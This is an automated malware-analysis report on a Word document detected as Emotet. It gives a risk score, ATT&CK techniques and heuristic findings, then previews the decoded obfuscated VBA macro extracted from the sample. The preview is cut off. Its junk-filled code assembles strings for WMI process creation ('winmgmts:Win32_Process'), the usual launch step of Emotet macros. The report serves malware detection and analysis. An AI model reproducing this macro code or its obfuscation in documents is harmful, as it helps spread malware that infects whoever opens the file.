MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, specifically an AutoOpen macro, which is a common execution vector for Emotet. The GetObject call within the macro further indicates an attempt to execute code. ClamAV detection explicitly names Emotet. The obfuscated VBA script likely performs actions to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Emotet-6866090-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-6866090-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52620 bytes |
SHA-256: cb0fdac6aece3c0137d582fdb8fcdbbd9ed2540e272f749bfdd59b7d9ba9e5f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "W1635_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "O7_501"
Function s765620()
Select Case u1_89_23
Case 160246792
Set h48____6 = h_05395
u8675___ = (W83__8_0 * Fix(234350919 / CBool(o06744))) - W2__76 / Oct(319357687) / 271696161 + CStr(K3_784) - 888302097 + ChrB(k_5_2_62)
Set z2780_ = j0604271
End Select
Select Case r912_6
Case 158677672
Set P587452 = X85719_4
Q06_72 = (S0_7_1_8 * Fix(859621107 / CBool(S407__5))) - c740__4 / Oct(870129185) / 945955234 + CStr(T76___) - 971375096 + ChrB(f7__04)
Set L8_2366 = M0___94
End Select
Select Case o91731
Case 782427697
Set Y__268 = Z213_59_
t4383_ = (L503__6 * Fix(199271678 / CBool(i1_4585))) - s_4784 / Oct(753628073) / 912117764 + CStr(w920_563) - 305568187 + ChrB(p_735_)
Set v934_80 = I_2195__
End Select
Select Case m595__
Case 528259646
Set i97_7_66 = l2_3802
a_1__216 = (Q763__ * Fix(432367320 / CBool(f79_9___))) - E0_407 / Oct(859595374) / 593590436 + CStr(s75347_) - 302996776 + ChrB(L286_6_1)
Set B4143763 = G699_326
End Select
Select Case b60_3_92
Case 143929562
Set h52_79 = a7_34724
D372_87_ = (A3_431_ * Fix(258734385 / CBool(P95297_))) - N183410 / Oct(828439098) / 565414746 + CStr(Q92__5_) - 505583947 + ChrB(l_6197)
Set Y8_4736 = Z3843_
End Select
Select Case c65981_9
Case 217872022
Set u_9__8_ = a4_1_64
T_9592 = (c__91_09 * Fix(596078557 / CBool(q308_8))) - Z4_3_7 / Oct(296944862) / 835316730 + CStr(d476___9) - 15985132 + ChrB(O75729)
Set V__6_10_ = J_20_1
End Select
End Function
Function G_69_27(J299_7, Y635_434)
On Error Resume Next
Select Case u0_820_
Case 294867888
Set c95678 = k76_73
z_7171 = (D8__584 * Fix(576463981 / CBool(p0__69))) - I73_3_4 / Oct(39064809) / 699421162 + CStr(K_8__6_0) - 22500428 + ChrB(J_9660)
Set V_8__4 = P204_4
End Select
Select Case z32_716
Case 670178782
Set q_39_8 = a1__28
O2_572_9 = (q4629306 * Fix(928575838 / CBool(X0_16_3))) - C880_4 / Oct(732953934) / 28549489 + CStr(s80__6_7) - 436627059 + ChrB(j972_7)
Set F2010_ = k567993_
End Select
Select Case G8_0___
Case 939385155
Set w04_4_4 = H_37_02
z2800_ = (j733200_ * Fix(729308679 / CBool(Y_548__9))) - I1089_ / Oct(442472212) / 972760792 + CStr(b_52_0) - 368078383 + ChrB(X0__4_)
Set u10_2__ = b9704_7
End Select
Y14035__ = F978__26 + "winm" + "gmts:Win32" + c__9__ + "_ProcessStartup" + a1_7_3
Select Case o__4_4
Case 303915704
Set W52_12 = P5_88_
l30_393 = (o_907_ * Fix(1315883 / CBool(s__1077_))) - L04_7_31 / Oct(617563525) / 532130956 + CStr(H_042_9_) - 385896287 + ChrB(m_080745)
Set a_9823 = u61_10
End Select
Select Case j619__
Case 845215775
Set u_02878_ = f30041_
F791_26 = (N_60355 * Fix(586235552 / CBool(n8488832))) - o9396045 / Oct(727942512) / 939962304 + CStr(z_811_) - 983037978 + ChrB(j217___)
Set b_5__00 = a21_10
End Select
Select Case a894__65
Case 436794220
Set T447_5_2 = Q2__883
c_393221 = (G8_55__ * Fix(949913307 / CBool(w4_6536))) - R5418__ / Oct(162872676) / 636521854 + CStr(p4378_8) - 792982796 + ChrB(l84__4)
Set M__5855_ = c583_9
End Select
n217_88_ = C8742_ + "winm" + "gmts:Win32" + a326_5 + "_Process" + V2_33_
Select Case h__5837_
Case 115771919
Set j5_9327 = k6_76_67
f0748__ = (D_13___ * Fix(424639074 / CBool(G251_34))) - v9__78 / Oct(453556423) / 719143305 + CStr(N_4_15) - 702454277 + ChrB(u908__)
Set Q0724_8 = M1998285
End Select
Select Case V8_7__0
Case 299880958
Set c68_7_ = O4937_
R_5273_0 = (A_5479 * Fix(222904223 / CBool(D86555))) - r_4132 / Oct(46293275) / 619175103 + CStr(B950_36_) - 915521942 + ChrB(n___94)
Set j1_8___5 = m59_03__
End Select
Select Case E9966941
Case 829374279
Set t_2275__ = T_0_316
j437_694 = (i1_4477 * Fix(282408140 / CBool(D6443__
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.